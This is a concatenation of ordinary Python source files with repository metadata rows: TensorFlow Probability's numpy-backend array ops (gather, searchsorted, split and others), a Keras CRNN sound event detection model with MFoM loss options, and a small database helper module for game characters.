def _ones_like(input, dtype=None, name=None):  # pylint: disable=redefined-builtin,unused-argument
  """Numpy counterpart of `tf.ones_like`."""
  return np.ones_like(input, dtype=utils.numpy_dtype(dtype))
# TODO(b/136555907): Add unit-test.
def _pad( # pylint: disable=unused-argument
tensor,
paddings,
mode='CONSTANT',
constant_values=0,
name=None):
return np.pad(
tensor, paddings,
mode=mode.lower(),
constant_values=constant_values)
def _range(start, limit=None, delta=1, dtype=None, name='range'):  # pylint: disable=unused-argument
  """Emulates tf.range."""
  # Emulating dtype inference logic from tf.range
  dtype = utils.numpy_dtype(dtype)
  start = ops.convert_to_tensor(start, dtype=dtype)
  limit = None if limit is None else ops.convert_to_tensor(limit, dtype=dtype)
  delta = ops.convert_to_tensor(delta, dtype=dtype)
  if dtype is None:
    # No dtype requested: promote to the "largest" argument dtype following
    # the int32 < int64 < float32 < float64 order below.
    dtype_hierarchy = [np.int32, np.int64, np.float32, np.float64]
    inferred_dtype = max([arg.dtype for arg in [start, limit, delta]
                          if arg is not None],
                         key=dtype_hierarchy.index)
  else:
    inferred_dtype = dtype
  return np.arange(start, limit, delta).astype(inferred_dtype)
def _reverse(tensor, axis, name=None): # pylint: disable=unused-argument
if np.array(axis).ndim == 0:
return np.flip(tensor, axis)
for ax in axis:
tensor = np.flip(tensor, ax)
return tensor
if JAX_MODE:
  # One batched (vmapped) searchsorted kernel per `side` value, built once
  # at import time and looked up by `_searchsorted` below.
  _searchsorted_vmap_sides = {
      side: jax.vmap(functools.partial(jax.numpy.searchsorted, side=side))
      for side in ('left', 'right')
  }
def _searchsorted(  # pylint: disable=unused-argument
    sorted_sequence,
    values,
    side='left',
    out_type=np.int32,
    name=None):
  """Find indices for insertion for list to remain sorted.

  Args:
    sorted_sequence: batch of sorted sequences (last axis sorted).
    values: batch of query values; leading batch shape must match.
    side: 'left' or 'right' insertion rule, as in `tf.searchsorted`.
    out_type: integer dtype of the returned indices.
    name: ignored (TF compatibility).

  Raises:
    ValueError: if `side` is not 'left' or 'right', or (JAX path) if the
      batch sizes of the two operands disagree.
  """
  # BUG FIX: previously an invalid `side` was only rejected on the JAX path;
  # the numpy path fell through to a NameError on `is_in_right_location`.
  # Validate once, up front, with the same message for both backends.
  if side not in ('left', 'right'):
    raise ValueError("'%s' is an invalid value for keyword 'side'" % side)
  if JAX_MODE:
    func = _searchsorted_vmap_sides[side]
    # jax.numpy.searchsorted is unbatched, so flatten to 2-D and vmap.
    sorted_sequence_2d = np.reshape(sorted_sequence,
                                    (-1, sorted_sequence.shape[-1]))
    values_2d = np.reshape(values, (-1, values.shape[-1]))
    if sorted_sequence_2d.shape[0] != values_2d.shape[0]:
      raise ValueError('Leading dim_size of both tensors must match.')
    return np.reshape(func(sorted_sequence_2d, values_2d).astype(out_type),
                      values.shape)
  # We don't use np.searchsorted in the numpy backend because it doesn't
  # support batching.  Instead compare every value against every sequence
  # element and count how many it exceeds.
  sorted_sequence = sorted_sequence[..., np.newaxis, :]
  values = values[..., :, np.newaxis]
  if side == 'left':
    is_in_right_location = sorted_sequence < values
  else:  # side == 'right', validated above.
    is_in_right_location = sorted_sequence <= values
  return np.sum(is_in_right_location, axis=-1).astype(out_type)
def _shape(input, out_type=np.int32, name=None):  # pylint: disable=redefined-builtin,unused-argument
  """Numpy counterpart of `tf.shape`: the shape of `input` as a tensor."""
  return ops.convert_to_tensor(ops.convert_to_tensor(input).shape).astype(
      out_type)
def _size(input, out_type=np.int32, name=None):  # pylint: disable=redefined-builtin, unused-argument
  """Numpy counterpart of `tf.size`: total number of elements of `input`."""
  return np.asarray(np.prod(ops.convert_to_tensor(input).shape), dtype=out_type)
builtin_slice = slice # pylint: disable=invalid-name
def _slice(input_, begin, size, name=None): # pylint: disable=unused-argument,redefined-outer-name
slices = tuple(
builtin_slice(b, b + s if s != -1 else None) for b, s in zip(begin, size))
return input_[slices]
def _split(value, num_or_size_splits, axis=0, num=None, name='split'): # pylint: disable=unused-argument
"""Map tf.split -> np.split."""
indices_or_sections = np.array(num_or_size_splits)
if indices_or_sections.ndim == 1:
if any(idx == -1 for idx in indices_or_sections):
# Numpy parameterizes by split indices and returns nsplits+1 arrays.
total_splits = sum(idx for idx in indices_or_sections if idx != -1)
remainder = int(max(0, np.array(value).shape[axis] - total_splits))
indices_or_sections = [
idx if idx != -1 else remainder for idx in indices_or_sections
]
indices_or_sections = np.cumsum(np.array(indices_or_sections))[:-1]
return np.split(value, indices_or_sections, axis)
def _stack(values, axis=0, name='stack'):
  """Numpy counterpart of `tf.stack`."""
  del name
  if axis is None:
    raise ValueError('None values for `axis` argument not supported.')
  # Match dtypes the way `tf.stack` would before stacking.
  values = _args_to_matching_arrays(values)
  return np.stack(values, axis=axis)
def _transpose(a, perm=None, conjugate=False, name='transpose'): # pylint: disable=unused-argument
x = np.transpose(a, perm)
return np.conjugate(x) if conjugate else x
def _zeros_like(input, dtype=None, name=None):  # pylint: disable=redefined-builtin,unused-argument
  """Numpy counterpart of `tf.zeros_like`."""
  return np.zeros_like(input, dtype=utils.numpy_dtype(dtype))
# --- Begin Public Functions --------------------------------------------------
concat = utils.copy_docstring(
'tf.concat',
_concat)
expand_dims = utils.copy_docstring(
'tf.expand_dims',
lambda input, axis, name=None: np.expand_dims(input, axis))
fill = utils.copy_docstring(
'tf.fill',
lambda dims, value, name=None: np.full(dims, value))
gather = utils.copy_docstring(
'tf.gather',
_gather)
gather_nd = utils.copy_docstring(
'tf.gather_nd',
_gather_nd)
reverse = utils.copy_docstring('tf.reverse', _reverse)
linspace = utils.copy_docstring(
'tf.linspace',
_linspace)
meshgrid = utils.copy_docstring(
'tf.meshgrid',
np.meshgrid)
norm = utils.copy_docstring(
'tf.norm',
norm)
one_hot = utils.copy_docstring(
'tf.one_hot',
_one_hot)
ones = utils.copy_docstring(
'tf.ones',
lambda shape, dtype=np.float32, name=None: np.ones( # pylint: disable=g-long-lambda
shape, utils.numpy_dtype(dtype)))
ones_like = utils.copy_docstring(
'tf.ones_like',
_ones_like)
pad = utils.copy_docstring(
'tf.pad',
_pad)
range = utils.copy_docstring( # pylint: disable=redefined-builtin
'tf.range',
_range)
rank = utils.copy_docstring(
'tf.rank',
lambda input, name=None: np.int32(np.array(input).ndim)) # pylint: disable=redefined-builtin,g-long-lambda
repeat = utils.copy_docstring(
'tf.repeat',
lambda input, repeats, axis=None, name=None: np.repeat( # pylint: disable=g-long-lambda
input, repeats, axis=axis))
reshape = utils.copy_docstring(
'tf.reshape',
lambda tensor, shape, name=None: np.reshape( # pylint: disable=g-long-lambda
ops.convert_to_tensor(tensor), shape))
roll = utils.copy_docstring(
'tf.roll',
lambda input, shift, axis: np.roll(input, shift, axis)) # pylint: disable=unnecessary-lambda
searchsorted = utils.copy_docstring(
'tf.searchsorted',
_searchsorted)
shape = utils.copy_docstring(
'tf.shape',
_shape)
size = utils.copy_docstring(
'tf.size',
_size)
slice = utils.copy_docstring( # pylint: disable=redefined-builtin
'tf.slice', _slice)
split = utils.copy_docstring('tf.split', _split)
squeeze = utils.copy_docstring(
'tf.squeeze',
lambda input, axis=None, name=None: np.squeeze(input, _astuple(axis)))
stack = utils.copy_docstring(
'tf.stack',
_stack)
tile = utils.copy_docstring(
'tf.tile',
lambda input, multiples, name=None: np.tile(np.array(input), multiples))
transpose = utils.copy_docstring(
'tf.transpose',
_transpose)
unstack = utils.copy_docstring(
'tf.unstack',
lambda value, num=None, axis=0, name='unstack': tuple( # pylint: disable=g-long-lambda
np.squeeze(x, axis=axis) for x in
np.split(value, value.shape[axis] if num is None else num, axis)))
where = utils.copy_docstring(
'tf.where',
lambda condition, x=None, y=None, name=None: np.where(condition, x, y))
zeros = utils.copy_docstring(
'tf.zeros',
lambda shape, dtype=np.float32, name=None: np.zeros( # pylint: disable=g-long-lambda
shape, utils.numpy_dtype(dtype)))
zeros_like = utils.copy_docstring(
'tf.zeros_like',
_zeros_like)
| 29.736626
| 111
| 0.679076
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
from tensorflow_probability.python.internal.backend.numpy import _utils as utils
from tensorflow_probability.python.internal.backend.numpy import ops
from tensorflow_probability.python.internal.backend.numpy.linalg_impl import einsum
from tensorflow_probability.python.internal.backend.numpy.linalg_impl import norm
from tensorflow_probability.python.internal.backend.numpy.linalg_impl import tensordot
__all__ = [
'concat',
'einsum',
'expand_dims',
'fill',
'gather',
'gather_nd',
'linspace',
'meshgrid',
'norm',
'one_hot',
'ones',
'ones_like',
'pad',
'range',
'rank',
'reshape',
'reverse',
'repeat',
'roll',
'searchsorted',
'shape',
'size',
'slice',
'split',
'squeeze',
'stack',
'tensordot',
'tile',
'transpose',
'unstack',
'where',
'zeros',
'zeros_like',
]
JAX_MODE = False
if JAX_MODE:
import jax
def _astuple(x):
try:
return tuple(x)
except TypeError:
return x
def _gather(
params,
indices,
validate_indices=None,
axis=None,
batch_dims=0,
name=None):
indices = ops.convert_to_tensor(indices, dtype_hint=np.int32)
if validate_indices is not None:
raise NotImplementedError(
'Argument `validate_indices != None` is currently unimplemented.')
if batch_dims < 0:
raise NotImplementedError('Negative `batch_dims` is currently unsupported.')
if axis is None:
axis = batch_dims
if axis < 0:
axis = axis + len(params.shape)
if JAX_MODE:
take = lambda params, indices: np.take(params, indices,
axis=axis - batch_dims)
take = functools.reduce(
lambda g, f: f(g), [jax.vmap] * int(batch_dims),
take
)
return take(params, indices)
params = ops.convert_to_tensor(params)
res = np.array([
np.take(params[i], indices[i], axis=axis - batch_dims)
for i in np.ndindex(*params.shape[:batch_dims])
])
return np.reshape(
res,
params.shape[:axis] + indices.shape[batch_dims:] + params.shape[axis+1:])
def _args_to_matching_arrays(args_list, dtype_hint=None):
dtype = None
for arg in args_list:
if ops.is_tensor(arg):
dtype = arg.dtype
break
if dtype is None:
ret = []
for arg in args_list:
ret.append(ops.convert_to_tensor(arg, dtype, dtype_hint=dtype_hint))
if dtype is None:
dtype = ret[-1].dtype
else:
ret = [ops.convert_to_tensor(arg, dtype) for arg in args_list]
return ret
def _concat(values, axis, name='concat'):
del name
if axis is None:
raise ValueError('None values for `axis` argument not supported.')
if not isinstance(values, (list, tuple)):
values = [values]
if len(values) == 1:
return values[0]
values = _args_to_matching_arrays(values)
return np.concatenate(values, axis=axis)
def _gather_nd_single(params, indices):
idx = tuple(np.moveaxis(indices, -1, 0))
return params[idx]
def _gather_nd(
params,
indices,
batch_dims=0,
name=None):
indices = ops.convert_to_tensor(indices, dtype_hint=np.int32)
if batch_dims < 0:
raise NotImplementedError('Negative `batch_dims` is currently unsupported.')
if not JAX_MODE and batch_dims > 0:
raise NotImplementedError(
'`batch_dims > 0` currently unsupported in NumPy backend.')
gather_nd_ = _gather_nd_single
if JAX_MODE:
gather_nd_ = functools.reduce(
lambda g, f: f(g), [jax.vmap] * int(batch_dims),
gather_nd_
)
return gather_nd_(params, indices)
def _linspace(start, stop, num, name=None, axis=0):
start = ops.convert_to_tensor(start)
if np.issubdtype(start.dtype, np.integer):
start = start.astype(np.float64)
stop = ops.convert_to_tensor(stop, dtype=start.dtype)
num = ops.convert_to_tensor(num, dtype_hint=np.int32)
if not np.issubdtype(num.dtype, np.integer):
raise TypeError('`num` must be an integer but got {}'.format(num.dtype))
num = num.astype(np.int32)
return np.linspace(start, stop, num, axis=axis).astype(start.dtype)
def _one_hot(
indices,
depth,
on_value=None,
off_value=None,
axis=None,
dtype=None,
name=None):
if on_value is None:
on_value = 1
if off_value is None:
off_value = 0
if dtype is None:
dtype = utils.common_dtype([on_value, off_value], np.float32)
indices = np.array(indices)
depth = np.array(depth)
pred = abs(np.arange(depth, dtype=indices.dtype) -
indices[..., np.newaxis]) > 0
y_out = np.where(pred, np.array(off_value, dtype), np.array(on_value, dtype))
if axis is not None:
y_out = np.moveaxis(y_out, -1, axis)
return y_out
def _ones_like(input, dtype=None, name=None):
return np.ones_like(input, dtype=utils.numpy_dtype(dtype))
def _pad(
tensor,
paddings,
mode='CONSTANT',
constant_values=0,
name=None):
return np.pad(
tensor, paddings,
mode=mode.lower(),
constant_values=constant_values)
def _range(start, limit=None, delta=1, dtype=None, name='range'):
dtype = utils.numpy_dtype(dtype)
start = ops.convert_to_tensor(start, dtype=dtype)
limit = None if limit is None else ops.convert_to_tensor(limit, dtype=dtype)
delta = ops.convert_to_tensor(delta, dtype=dtype)
if dtype is None:
dtype_hierarchy = [np.int32, np.int64, np.float32, np.float64]
inferred_dtype = max([arg.dtype for arg in [start, limit, delta]
if arg is not None],
key=dtype_hierarchy.index)
else:
inferred_dtype = dtype
return np.arange(start, limit, delta).astype(inferred_dtype)
def _reverse(tensor, axis, name=None):
if np.array(axis).ndim == 0:
return np.flip(tensor, axis)
for ax in axis:
tensor = np.flip(tensor, ax)
return tensor
if JAX_MODE:
_searchsorted_vmap_sides = {
side: jax.vmap(functools.partial(jax.numpy.searchsorted, side=side))
for side in ('left', 'right')
}
def _searchsorted(
sorted_sequence,
values,
side='left',
out_type=np.int32,
name=None):
if JAX_MODE:
try:
func = _searchsorted_vmap_sides[side]
except KeyError:
raise ValueError("'%s' is an invalid value for keyword 'side'" % side)
sorted_sequence_2d = np.reshape(sorted_sequence,
(-1, sorted_sequence.shape[-1]))
values_2d = np.reshape(values, (-1, values.shape[-1]))
if sorted_sequence_2d.shape[0] != values_2d.shape[0]:
raise ValueError('Leading dim_size of both tensors must match.')
return np.reshape(func(sorted_sequence_2d, values_2d).astype(out_type),
values.shape)
sorted_sequence = sorted_sequence[..., np.newaxis, :]
values = values[..., :, np.newaxis]
if side == 'left':
is_in_right_location = sorted_sequence < values
elif side == 'right':
is_in_right_location = sorted_sequence <= values
return np.sum(is_in_right_location, axis=-1).astype(out_type)
def _shape(input, out_type=np.int32, name=None):
return ops.convert_to_tensor(ops.convert_to_tensor(input).shape).astype(
out_type)
def _size(input, out_type=np.int32, name=None):
return np.asarray(np.prod(ops.convert_to_tensor(input).shape), dtype=out_type)
builtin_slice = slice
def _slice(input_, begin, size, name=None):
slices = tuple(
builtin_slice(b, b + s if s != -1 else None) for b, s in zip(begin, size))
return input_[slices]
def _split(value, num_or_size_splits, axis=0, num=None, name='split'):
indices_or_sections = np.array(num_or_size_splits)
if indices_or_sections.ndim == 1:
if any(idx == -1 for idx in indices_or_sections):
total_splits = sum(idx for idx in indices_or_sections if idx != -1)
remainder = int(max(0, np.array(value).shape[axis] - total_splits))
indices_or_sections = [
idx if idx != -1 else remainder for idx in indices_or_sections
]
indices_or_sections = np.cumsum(np.array(indices_or_sections))[:-1]
return np.split(value, indices_or_sections, axis)
def _stack(values, axis=0, name='stack'):
del name
if axis is None:
raise ValueError('None values for `axis` argument not supported.')
values = _args_to_matching_arrays(values)
return np.stack(values, axis=axis)
def _transpose(a, perm=None, conjugate=False, name='transpose'):
x = np.transpose(a, perm)
return np.conjugate(x) if conjugate else x
def _zeros_like(input, dtype=None, name=None):
return np.zeros_like(input, dtype=utils.numpy_dtype(dtype))
concat = utils.copy_docstring(
'tf.concat',
_concat)
expand_dims = utils.copy_docstring(
'tf.expand_dims',
lambda input, axis, name=None: np.expand_dims(input, axis))
fill = utils.copy_docstring(
'tf.fill',
lambda dims, value, name=None: np.full(dims, value))
gather = utils.copy_docstring(
'tf.gather',
_gather)
gather_nd = utils.copy_docstring(
'tf.gather_nd',
_gather_nd)
reverse = utils.copy_docstring('tf.reverse', _reverse)
linspace = utils.copy_docstring(
'tf.linspace',
_linspace)
meshgrid = utils.copy_docstring(
'tf.meshgrid',
np.meshgrid)
norm = utils.copy_docstring(
'tf.norm',
norm)
one_hot = utils.copy_docstring(
'tf.one_hot',
_one_hot)
ones = utils.copy_docstring(
'tf.ones',
lambda shape, dtype=np.float32, name=None: np.ones(
shape, utils.numpy_dtype(dtype)))
ones_like = utils.copy_docstring(
'tf.ones_like',
_ones_like)
pad = utils.copy_docstring(
'tf.pad',
_pad)
range = utils.copy_docstring(
'tf.range',
_range)
rank = utils.copy_docstring(
'tf.rank',
lambda input, name=None: np.int32(np.array(input).ndim))
repeat = utils.copy_docstring(
'tf.repeat',
lambda input, repeats, axis=None, name=None: np.repeat(
input, repeats, axis=axis))
reshape = utils.copy_docstring(
'tf.reshape',
lambda tensor, shape, name=None: np.reshape(
ops.convert_to_tensor(tensor), shape))
roll = utils.copy_docstring(
'tf.roll',
lambda input, shift, axis: np.roll(input, shift, axis))
searchsorted = utils.copy_docstring(
'tf.searchsorted',
_searchsorted)
shape = utils.copy_docstring(
'tf.shape',
_shape)
size = utils.copy_docstring(
'tf.size',
_size)
slice = utils.copy_docstring(
'tf.slice', _slice)
split = utils.copy_docstring('tf.split', _split)
squeeze = utils.copy_docstring(
'tf.squeeze',
lambda input, axis=None, name=None: np.squeeze(input, _astuple(axis)))
stack = utils.copy_docstring(
'tf.stack',
_stack)
tile = utils.copy_docstring(
'tf.tile',
lambda input, multiples, name=None: np.tile(np.array(input), multiples))
transpose = utils.copy_docstring(
'tf.transpose',
_transpose)
unstack = utils.copy_docstring(
'tf.unstack',
lambda value, num=None, axis=0, name='unstack': tuple(
np.squeeze(x, axis=axis) for x in
np.split(value, value.shape[axis] if num is None else num, axis)))
where = utils.copy_docstring(
'tf.where',
lambda condition, x=None, y=None, name=None: np.where(condition, x, y))
zeros = utils.copy_docstring(
'tf.zeros',
lambda shape, dtype=np.float32, name=None: np.zeros(
shape, utils.numpy_dtype(dtype)))
zeros_like = utils.copy_docstring(
'tf.zeros_like',
_zeros_like)
| true
| true
|
790c66566a61f71f21523cf5a6ec3643721ff40a
| 6,021
|
py
|
Python
|
src/model/sed_ogits.py
|
Vanova/mfom_attribute_detection
|
450cf79226f2b26407aa0d2636d0f5217d6f4f48
|
[
"MIT"
] | 11
|
2019-03-02T11:05:28.000Z
|
2022-02-15T15:51:46.000Z
|
src/model/sed_ogits.py
|
Vanova/mfom_attribute_detection
|
450cf79226f2b26407aa0d2636d0f5217d6f4f48
|
[
"MIT"
] | null | null | null |
src/model/sed_ogits.py
|
Vanova/mfom_attribute_detection
|
450cf79226f2b26407aa0d2636d0f5217d6f4f48
|
[
"MIT"
] | 5
|
2019-03-02T11:05:31.000Z
|
2020-09-01T20:33:05.000Z
|
import keras.backend as K
from keras.models import Model
from keras.layers import Dense, MaxPooling2D, Conv2D, Activation, \
Dropout, Reshape, Input, BatchNormalization, GRU, Bidirectional, Permute, TimeDistributed
from keras.optimizers import Adam, SGD, Adadelta, RMSprop
import src.model.mfom as mfom
import src.model.objectives as obj
from src.base.model import BaseModel
class SEDOgitsModel(BaseModel):
    """
    The Sound Event Detection model (CRNN with a time-distributed output).

    # Arguments
        config: dict-like hyper-parameter store (feature_maps, dropout,
            activation, out_score, loss, optimizer, learn_rate, ...)
        input_shape: [batch_sz; band; frame_wnd; channel]
        nclass: number of output classes per frame
    """

    def __init__(self, config, input_shape, nclass):
        super(SEDOgitsModel, self).__init__(config)
        self.input_shape = input_shape
        self.nclass = nclass
        self.build()

    def build(self):
        """
        Construct the main structure of the network:
        CNN (frequency pooling) -> bidirectional GRU -> time-distributed FC.
        """
        print('DNN input shape', self.input_shape)
        if K.image_dim_ordering() == 'tf':
            batch_sz, bands, frames, channels = self.input_shape
            assert channels >= 1
            channel_axis = 3
            freq_axis = 1
            nn_shape = (bands, frames, channels)
        else:
            raise NotImplementedError('[ERROR] Only for TensorFlow background.')
        nb_filters = self.config['feature_maps']
        dropout_rate = self.config['dropout']
        pool_sz = [5, 2, 2]  # max-pooling across frequency only
        gru_nb = [32]  # [32, 32]
        fc_nb = [32]
        # Input block
        feat_input = Input(shape=nn_shape, name='input')
        x = BatchNormalization(axis=freq_axis, name='bn_0_freq')(feat_input)
        # CNN block: conv + BN + activation, pool only along frequency so
        # the time resolution (frames) is preserved for the recurrent part.
        for sz in pool_sz:
            x = Conv2D(filters=nb_filters, kernel_size=(3, 3), padding='same')(x)
            x = BatchNormalization(axis=channel_axis)(x)
            x = Activation(self.config['activation'])(x)
            x = MaxPooling2D(pool_size=(sz, 1))(x)
            x = Dropout(dropout_rate)(x)
        # Fold the remaining frequency/channel dims into features per frame.
        x = Permute((2, 1, 3))(x)
        x = Reshape((frames, -1))(x)
        # GRU block
        for n in gru_nb:
            x = Bidirectional(
                GRU(n, activation='tanh', dropout=dropout_rate,
                    recurrent_dropout=dropout_rate, return_sequences=True),
                merge_mode='mul')(x)
        # Fully connected
        for n in fc_nb:
            x = TimeDistributed(Dense(n))(x)
            x = Dropout(dropout_rate)(x)
        x = TimeDistributed(Dense(self.nclass))(x)
        # out dim: [batch, frames, nclass]
        y_pred = Activation(activation=self.config['out_score'], name='output')(x)
        self._compile_model(input=feat_input, output=y_pred, params=self.config)

    def rebuild(self, new_config):
        """
        Recompile the model with the new hyper parameters.
        NOTE: network topology is changing according to the 'new_config'
        (batch size and context window are taken from it).
        """
        self.config.update(new_config)
        batch_sz, bands, frames, channels = self.input_shape
        self.input_shape = (self.config['batch'], bands, self.config['context_wnd'], channels)
        self.build()

    def chage_optimizer(self, new_config, change_out_unit=False):
        """
        Recompile the model with the new loss and optimizer.
        NOTE: network topology is not changing.
        (NOTE(review): method name 'chage_optimizer' looks like a typo for
        'change_optimizer', kept for caller compatibility.)
        """
        if new_config['freeze_wt']:
            # train only the top layers,
            # i.e. freeze all lower layers
            for layer in self.model.layers[:-4]:
                layer.trainable = False
        # cut MFoM layers: use only output prediction scores
        input = self.model.get_layer(name='input').output
        output = self.model.get_layer(name='output').output
        if change_out_unit:
            # Re-attach the output activation with the new score function.
            la = self.model.layers[-2].output
            output = Activation(activation=new_config['out_score'], name='output')(la)
            print('[INFO] output scores has been changed: %s to %s' % (self.config['out_score'], new_config['out_score']))
        self._compile_model(input=input, output=output, params=new_config)

    def forward(self, x):
        # When trained with an MFoM loss the network has extra wrapper
        # layers; predict from the raw 'output' scores instead.
        out_model = self.model
        if self.model.loss in obj.MFOM_OBJECTIVES:
            input = self.model.get_layer(name='input').output
            preact = self.model.get_layer(name='output').output
            out_model = Model(input=input, output=preact)
        return out_model.predict(x)

    def _compile_model(self, input, output, params):
        """
        Compile network structure with particular loss and optimizer
        """
        # ===
        # choose loss
        # ===
        if params['loss'] in obj.MFOM_OBJECTIVES:
            # add 2 layers for Maximal Figure-of-Merit
            _, _, frames, _ = self.input_shape
            y_true = Input(shape=(frames, self.nclass), name='y_true')
            psi = mfom.UvZMisclassification(name='uvz_misclass')([y_true, output])
            y_pred = mfom.SmoothErrorCounter(name='smooth_error_counter')(psi)
            # MFoM need labels info during training
            input = [y_true, input]
            output = y_pred
            loss = obj.MFOM_OBJECTIVES[params['loss']]
        elif params['loss'] == obj.mfom_eer_embed.__name__:
            loss = obj.mfom_eer_embed
        else:
            loss = params['loss']
        # ===
        # choose optimizer
        # ===
        if params['optimizer'] == 'adam':
            optimizer = Adam(lr=params['learn_rate'], beta_1=0.9, beta_2=0.999, epsilon=1e-08)
        elif params['optimizer'] == 'sgd':
            optimizer = SGD(lr=params['learn_rate'], decay=1e-6, momentum=0.9, nesterov=True)
        elif params['optimizer'] == 'adadelta':
            optimizer = Adadelta(lr=params['learn_rate'])
        elif params['optimizer'] == 'rmsprop':
            optimizer = RMSprop(lr=params['learn_rate'])
        else:
            # Fall back to whatever keras accepts (name or optimizer object).
            optimizer = params['optimizer']
        self.model = Model(input=input, output=output)
        self.model.compile(loss=loss, optimizer=optimizer)
        self.model.summary()
| 39.352941
| 122
| 0.603222
|
import keras.backend as K
from keras.models import Model
from keras.layers import Dense, MaxPooling2D, Conv2D, Activation, \
Dropout, Reshape, Input, BatchNormalization, GRU, Bidirectional, Permute, TimeDistributed
from keras.optimizers import Adam, SGD, Adadelta, RMSprop
import src.model.mfom as mfom
import src.model.objectives as obj
from src.base.model import BaseModel
class SEDOgitsModel(BaseModel):
def __init__(self, config, input_shape, nclass):
super(SEDOgitsModel, self).__init__(config)
self.input_shape = input_shape
self.nclass = nclass
self.build()
def build(self):
print('DNN input shape', self.input_shape)
if K.image_dim_ordering() == 'tf':
batch_sz, bands, frames, channels = self.input_shape
assert channels >= 1
channel_axis = 3
freq_axis = 1
nn_shape = (bands, frames, channels)
else:
raise NotImplementedError('[ERROR] Only for TensorFlow background.')
nb_filters = self.config['feature_maps']
dropout_rate = self.config['dropout']
pool_sz = [5, 2, 2]
gru_nb = [32]
fc_nb = [32]
feat_input = Input(shape=nn_shape, name='input')
x = BatchNormalization(axis=freq_axis, name='bn_0_freq')(feat_input)
for sz in pool_sz:
x = Conv2D(filters=nb_filters, kernel_size=(3, 3), padding='same')(x)
x = BatchNormalization(axis=channel_axis)(x)
x = Activation(self.config['activation'])(x)
x = MaxPooling2D(pool_size=(sz, 1))(x)
x = Dropout(dropout_rate)(x)
x = Permute((2, 1, 3))(x)
x = Reshape((frames, -1))(x)
for n in gru_nb:
x = Bidirectional(
GRU(n, activation='tanh', dropout=dropout_rate,
recurrent_dropout=dropout_rate, return_sequences=True),
merge_mode='mul')(x)
for n in fc_nb:
x = TimeDistributed(Dense(n))(x)
x = Dropout(dropout_rate)(x)
x = TimeDistributed(Dense(self.nclass))(x)
y_pred = Activation(activation=self.config['out_score'], name='output')(x)
self._compile_model(input=feat_input, output=y_pred, params=self.config)
def rebuild(self, new_config):
self.config.update(new_config)
batch_sz, bands, frames, channels = self.input_shape
self.input_shape = (self.config['batch'], bands, self.config['context_wnd'], channels)
self.build()
def chage_optimizer(self, new_config, change_out_unit=False):
if new_config['freeze_wt']:
for layer in self.model.layers[:-4]:
layer.trainable = False
input = self.model.get_layer(name='input').output
output = self.model.get_layer(name='output').output
if change_out_unit:
la = self.model.layers[-2].output
output = Activation(activation=new_config['out_score'], name='output')(la)
print('[INFO] output scores has been changed: %s to %s' % (self.config['out_score'], new_config['out_score']))
self._compile_model(input=input, output=output, params=new_config)
def forward(self, x):
out_model = self.model
if self.model.loss in obj.MFOM_OBJECTIVES:
input = self.model.get_layer(name='input').output
preact = self.model.get_layer(name='output').output
out_model = Model(input=input, output=preact)
return out_model.predict(x)
def _compile_model(self, input, output, params):
if params['loss'] in obj.MFOM_OBJECTIVES:
_, _, frames, _ = self.input_shape
y_true = Input(shape=(frames, self.nclass), name='y_true')
psi = mfom.UvZMisclassification(name='uvz_misclass')([y_true, output])
y_pred = mfom.SmoothErrorCounter(name='smooth_error_counter')(psi)
input = [y_true, input]
output = y_pred
loss = obj.MFOM_OBJECTIVES[params['loss']]
elif params['loss'] == obj.mfom_eer_embed.__name__:
loss = obj.mfom_eer_embed
else:
loss = params['loss']
if params['optimizer'] == 'adam':
optimizer = Adam(lr=params['learn_rate'], beta_1=0.9, beta_2=0.999, epsilon=1e-08)
elif params['optimizer'] == 'sgd':
optimizer = SGD(lr=params['learn_rate'], decay=1e-6, momentum=0.9, nesterov=True)
elif params['optimizer'] == 'adadelta':
optimizer = Adadelta(lr=params['learn_rate'])
elif params['optimizer'] == 'rmsprop':
optimizer = RMSprop(lr=params['learn_rate'])
else:
optimizer = params['optimizer']
self.model = Model(input=input, output=output)
self.model.compile(loss=loss, optimizer=optimizer)
self.model.summary()
| true
| true
|
790c667af0b3ef0f91b2ea3e4d81e454bdd15744
| 1,239
|
py
|
Python
|
db_characters.py
|
JackNolanDev/vennt-server
|
03c6c450d50f9f7e8ab0bb844a1cad6b68e5aa47
|
[
"MIT"
] | null | null | null |
db_characters.py
|
JackNolanDev/vennt-server
|
03c6c450d50f9f7e8ab0bb844a1cad6b68e5aa47
|
[
"MIT"
] | null | null | null |
db_characters.py
|
JackNolanDev/vennt-server
|
03c6c450d50f9f7e8ab0bb844a1cad6b68e5aa47
|
[
"MIT"
] | null | null | null |
# Josh Aaron Miller 2021
# VenntDB methods for Characters
import venntdb
from constants import *
# VenntDB Methods
def character_exists(self, username, char_id):
return self.get_character(username, char_id) is not None
def get_character(self, username, char_id):
self.assert_valid("accounts", username, "characters")
if self.is_valid("accounts", username, "characters", char_id):
return self.db["accounts"][username]["characters"][char_id]
return None
def create_character(self, username, character):
self.assert_valid("accounts", username, "characters")
self.db["accounts"][username]["characters"][character["id"]] = character
self.save_db()
def get_characters(self, username):
self.assert_valid("accounts", username, "characters")
return self.db["accounts"][username]["characters"]
def get_attr(self, username, char_id, attr):
self.assert_valid("accounts", username, "characters", char_id)
return self.get_character(username, char_id)[attr]
def set_attr(self, username, char_id, attr, val):
self.assert_valid("accounts", username, "characters", char_id)
self.get_character(username, char_id)[attr] = val
self.save_db()
| 30.219512
| 77
| 0.702986
|
import venntdb
from constants import *
def character_exists(self, username, char_id):
return self.get_character(username, char_id) is not None
def get_character(self, username, char_id):
self.assert_valid("accounts", username, "characters")
if self.is_valid("accounts", username, "characters", char_id):
return self.db["accounts"][username]["characters"][char_id]
return None
def create_character(self, username, character):
self.assert_valid("accounts", username, "characters")
self.db["accounts"][username]["characters"][character["id"]] = character
self.save_db()
def get_characters(self, username):
self.assert_valid("accounts", username, "characters")
return self.db["accounts"][username]["characters"]
def get_attr(self, username, char_id, attr):
self.assert_valid("accounts", username, "characters", char_id)
return self.get_character(username, char_id)[attr]
def set_attr(self, username, char_id, attr, val):
self.assert_valid("accounts", username, "characters", char_id)
self.get_character(username, char_id)[attr] = val
self.save_db()
| true
| true
|
790c6680a68ee15abeaeba01dd8ecfef161ac03b
| 2,404
|
py
|
Python
|
examples/test_cam_config.py
|
vihank/gym-donkeycar
|
2e3cd780d92f3d5da5a0f9c67272a0cd3f08befe
|
[
"MIT"
] | null | null | null |
examples/test_cam_config.py
|
vihank/gym-donkeycar
|
2e3cd780d92f3d5da5a0f9c67272a0cd3f08befe
|
[
"MIT"
] | null | null | null |
examples/test_cam_config.py
|
vihank/gym-donkeycar
|
2e3cd780d92f3d5da5a0f9c67272a0cd3f08befe
|
[
"MIT"
